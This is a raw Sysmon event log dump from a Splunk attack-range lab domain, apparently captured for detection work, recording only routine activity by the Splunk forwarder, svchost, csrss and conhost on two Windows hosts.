23542300x80000000000000001055805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:22.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CF707837F542BDA2B43B74F8F4391A,SHA256=E43F07BF56D29CF4AF99AE8DBB7F90AE295DF901BEF0029BC535ACA1FC6BA777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:22.715{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05ADF4DBAD24B6CC0D749EC2DA06B69,SHA256=90158FA1A1E6E6CA4FFBE337A42AB92DBE328C745F8F1E0B43B09059A86FCB89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:21.083{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57515-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001055807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:23.985{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4427F6B4449D0FE5A6F93C893B6794E2,SHA256=B4AAF4C2DFAD7204E3E01A6A77CE823D484F78DAE14565A05732854FED76FD54,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000811042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:23.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E16259BB03AB47CFBBD10714E4735ECC,SHA256=0C7D45EFB00C158BE1C0DFBD079258D6D14CE876395C18F036348454D7B128BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.591{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62021-false10.0.1.12-8000- 354300x8000000000000000811041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:22.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57516-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000811069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.965{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.808{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8662D830C2588ABC1C0BCE5E7BE153E3,SHA256=7E61DEF22E24E3A6D3619C8509B1A1ECA2F67F139D25079B99A9869BC17B3CDB,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000811056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.480{0C1E0330-F92C-60EB-F979-00000000D001}37803756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
